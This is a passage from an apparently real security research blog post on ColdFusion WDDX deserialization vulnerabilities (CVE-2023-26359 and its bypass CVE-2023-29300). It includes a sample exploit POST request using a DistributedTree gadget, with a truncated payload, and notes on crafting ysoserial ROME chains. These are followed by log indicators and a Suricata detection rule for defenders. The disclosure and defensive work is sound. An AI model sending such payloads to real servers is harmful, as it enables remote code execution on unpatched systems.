    <p>As explained in this <a href="https://nickbloor.co.uk/2018/06/18/another-coldfusion-rce-cve-2018-4939/">blog post</a> from <code class="language-plaintext highlighter-rouge">NickstaDB</code>, the <code class="language-plaintext highlighter-rouge">ysoserial</code> tool to be used with <code class="language-plaintext highlighter-rouge">ColdFusionPwn</code> should be compiled against the <code class="language-plaintext highlighter-rouge">rome-cf.jar</code> included within the targeted ColdFusion version to ensure the <code class="language-plaintext highlighter-rouge">serialVersionUID</code>’s match.</p>
  </li>
  <li>use the newly created tools to craft a gadget chain using the <code class="language-plaintext highlighter-rouge">ROME</code> Gadget Chain within <code class="language-plaintext highlighter-rouge">ysoserial</code></li>
</ol>

<h1 id="cve-2023-29300-discovery">CVE-2023-29300 Discovery</h1>

<p>As explained in the <em>CVE-2023-26359 was exploited as a 0-day</em> paragraph, the ColdFusion 2021 patch left intact CVE-2023-26359. To understand the reason for that, a ColdFusion 2018 was patch diffed instead, and Adobe’s provided fix for CVE-2023-26359 was now apparent: It essentially removed the <code class="language-plaintext highlighter-rouge">ReplicatedTree</code> classes from the ColdFusion runtime libraries, as outlined in the following figure.</p>

<p><img data-src="/assets/img/2024-02-14-ColdFusion-WDDX-2023/image1.png" alt="patchdiff" data-proofer-ignore></p>

<p>The absence of the <code class="language-plaintext highlighter-rouge">org.jgroups.**</code> classes in ColdFusion 2021 explains why no patch for CVE-2023-26359 was detected at first (and reproduction attempts were unsuccessful). This implies the fix prevented the observed ITW exploit by removing the possibility of <code class="language-plaintext highlighter-rouge">org.jgroups.blocks.ReplicatedTree</code> class instantiation; however, this mitigation strategy did not prevent attackers from targeting alternative library classes that can potentially be used for deserializing user-controlled input and ultimately facilitating code execution.</p>

<p>In particular, ColdFusion runtime libraries were still containing classes that allow for the same exploitation pattern as the observed ITW exploit targeting CVE-2023-26359, as explained in this already mentioned <a href="https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html">CodeWhiteSec blog</a>:</p>

<p><img data-src="/assets/img/2024-02-14-ColdFusion-WDDX-2023/image2.png" alt="classes" data-proofer-ignore></p>

<p>To finally achieve RCE after CVE-2023-26359 patch, all that was needed is to use one of those alternate classes as the struct for the WDDX data:</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/filemanager.cfc?method=getfmfiles HTTP/1.1

Content-Type: application/x-www-form-urlencoded

argumentCollection=&lt;wddxPacket+version="1.0"&gt;&lt;header/&gt;&lt;data&gt;&lt;struct+type="Lorg.jgroups.blocks.DistributedTree;"&gt;&lt;var+name="state"&gt;&lt;binary+length='3301'&gt;AqztAAVzc[...]&lt;/binary&gt;&lt;/var&gt;&lt;/struct&gt;&lt;/data&gt;&lt;/wddxPacket&gt;
</pre></td></tr></tbody></table></code></div></div>

<h1 id="for-defenders-against-cve-2023-26359-and-cve-2023-29300">For Defenders Against CVE-2023-26359 and CVE-2023-29300</h1>

<h2 id="indicator-of-exploitation">Indicator of Exploitation <a href="#indicator-of-exploitation" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2>

<p><em>please note this should apply to CVE-2023-36803 and CVE-2023-36804 as well</em></p>

<p>After the WDDX packet content is deserialized, it is cast to either a <code class="language-plaintext highlighter-rouge">Struct</code> in ColdFusion 2018 and 2021 or to a <code class="language-plaintext highlighter-rouge">FastHashTable</code> structure in ColdFusion 2016 to create the <code class="language-plaintext highlighter-rouge">argumentCollection</code> object, as highlighted in the following code snippet from ColdFusion 2018:</p>

<div class="language-java highlighter-rouge"><div class="code-header">
        <span data-label-text="Java"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre><span class="nc">Struct</span> <span class="n">argumentCollection</span><span class="o">;</span>

<span class="k">if</span> <span class="o">(</span><span class="n">attr</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span>
    <span class="n">argumentCollection</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Struct</span><span class="o">();</span>
<span class="o">}</span> <span class="k">else</span> <span class="o">{</span>
    <span class="n">attr</span> <span class="o">=</span> <span class="n">attr</span><span class="o">.</span><span class="na">trim</span><span class="o">();</span>
    <span class="k">if</span> <span class="o">(</span><span class="n">attr</span><span class="o">.</span><span class="na">charAt</span><span class="o">(</span><span class="mi">0</span><span class="o">)</span> <span class="o">==</span> <span class="sc">'{'</span><span class="o">)</span> <span class="o">{</span>
        <span class="n">argumentCollection</span> <span class="o">=</span> <span class="o">(</span><span class="nc">Struct</span><span class="o">)</span><span class="nc">JSONUtils</span><span class="o">.</span><span class="na">deserializeJSON</span><span class="o">(</span><span class="n">attr</span><span class="o">);</span>
    <span class="o">}</span> <span class="k">else</span> <span class="o">{</span>
        <span class="n">argumentCollection</span> <span class="o">=</span> <span class="o">(</span><span class="nc">Struct</span><span class="o">)</span><span class="nc">WDDXDeserialize</span><span class="o">(</span><span class="n">attr</span><span class="o">);</span>
    <span class="o">}</span>
<span class="o">}</span>
</pre></td></tr></tbody></table></code></div></div>

<p>In legitimate cases, the base class used to pass the arguments to a CFC method through WDDX is <code class="language-plaintext highlighter-rouge">coldfusion.runtime.ArgumentCollection</code>. When using this class, the cast present in the aforementioned code snippet does not cause any issues. However, in the case of an exploit targeting the previously mentioned vulnerabilities, the type cast from the class used as a deserialization payload to <code class="language-plaintext highlighter-rouge">Struct</code> or <code class="language-plaintext highlighter-rouge">FastHashTable</code> is illegal and results in an error that can be found in Coldfusion’s <code class="language-plaintext highlighter-rouge">coldfusion-out</code> log file:</p>

<ul>
  <li>
    <p>ColdFusion 2016:</p>

    <div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>&lt;timestamp&gt; Error [&lt;thread&gt;] - &lt;attacker’s class used for deserialization exploit&gt; cannot be cast to coldfusion.util.FastHashtable

The specific sequence of files included or processed is: &lt;endpoint used by attacker&gt;
</pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>
    <p>ColdFusion 2018 and 2021:</p>

    <div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>&lt;timestamp&gt; Error [&lt;thread&gt;] - class &lt;attacker’s class used for deserialization exploit&gt; cannot be cast to class coldfusion.runtime.Struct (&lt;attacker class used for deserialization exploit&gt; and coldfusion.runtime.Struct are in unnamed module of loader coldfusion.bootstrap.BootstrapClassLoader&lt;redacted&gt;)

The specific sequence of files included or processed is: &lt;endpoint used by attacker&gt;
</pre></td></tr></tbody></table></code></div>    </div>
  </li>
</ul>

<p>It should be noted the presence of this error does not mean for sure that exploitation was attempted. In case it’s present, a forensic analysis is warranted.</p>

<h2 id="network-signature">Network Signature <a href="#network-signature" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2>

<p>Setting an efficient request blocking is not an easy task for the exploits leveraging those vulnerabilities, given the possible variants on the initial class used for deserialization, the possibility of request encoding, the GET/POST variant and the need for legitimate uses in production code. The following Suricata rule aims at detecting, for the basic payloads, whenever a non-ColdFusion class is used in WDDX data within a POST request.</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>alert http $EXTERNAL_NET any -&gt; $COLDFUSION_SERVER_IP $COLDFUSION_SERVER_PORT (msg: "CrowdStrike -  potential ColdFusion 2023 deserialization exploit attempt"; flow:to_server, established; http.method; content:"POST"; http.uri; content:".cfc"; nocase; http.request_body; url_decode; content:"argumentCollection"; http.request_body; url_decode; content:"wddxPacket"; distance:1; within:12; http.request_body; url_decode; content:"struct type"; http.request_body; url_decode; content:!"coldfusion"; distance:1; within:12; sid:XXXXXXXX; rev:XXXXXXX;)
</pre></td></tr></tbody></table></code></div></div>

<h1 id="conclusion">Conclusion</h1>

<p>I do hope information contained in this post is still of some value despite being published almost 1 year later. As of this writing, WDDX deserialization was the root cause for many security patches in 2023 for ColdFusion. Simply put, CVE-2023-29300 is a CVE-2023-26359 patch bypass, CVE-2023-38203 is a CVE-2023-2930 patch bypass, and CVE-2023-38204 is a CVE-2023-38203 patch bypass. Now, WDDX deserialization is protected by a whitelist approach allowing only for Coldfusion classes to be deserialized. Even if <a href="https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/">NCC group still highlighted possible vulnerabilities using these</a>, I do have the impression that RCE through WDDX deserialization is now dead (please note this is an impression and not the result of a thorough code analysis). As a consequence, please make sure to have your ColdFusion instances updated.</p>

</div>


      
    
    

    </div>
  </div> <!-- #core-wrapper -->

  <!-- pannel -->
  <div id="panel-wrapper" class="col-xl-3 pl-2 text-muted">

    <div class="access">
      


















    </div>

    
      
      



<!-- BS-toc.js will be loaded at medium priority -->
<script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script>

<div id="toc-wrapper" class="pl-0 pr-4 mb-5">
  <div class="panel-heading pl-3 pt-2 mb-2">Contents</div>
  <nav id="toc" data-toggle="toc"></nav>
</div>


    
  </div>

</div>

<!-- tail -->



      </div>

      <!--
  The Search results
-->
<div id="search-result-wrapper" class="d-flex justify-content-center unloaded">
  <div class="col-12 col-sm-11 post-content">
    <div id="search-hints">
      


















    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>


    </div> <!-- #main-wrapper -->

    

    <div id="mask"></div>

    <a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button">
      <i class="fas fa-angle-up"></i>
    </a>

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script>

<script>
SimpleJekyllSearch({
  searchInput: document.getElementById('search-input'),
  resultsContainer: document.getElementById('search-results'),
  json: '/assets/js/data/search.json',
  searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0">  <a href="{url}">{title}</a>  <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">    {categories}    {tags}  </div>  <p>{snippet}</p></div>',
  noResultsText: '<p class="mt-5">Oops! No result founds.</p>',
  templateMiddleware: function(prop, value, template) {
    if (prop === 'categories') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
      }
    }

    if (prop === 'tags') {
      if (value === '') {
        return `${value}`;
      } else {
        return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
      }
    }
  }
});
</script>


    <!--
  JS selector for site.
-->

<!-- layout specified -->


  



  <!-- image lazy-loading & popup -->
  <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/clipboard@2/dist/clipboard.min.js"></script>




  

  <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script>





<script defer src="/assets/js/dist/post.min.js"></script>



<!-- commons -->

<script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script>




  </body>

</html>

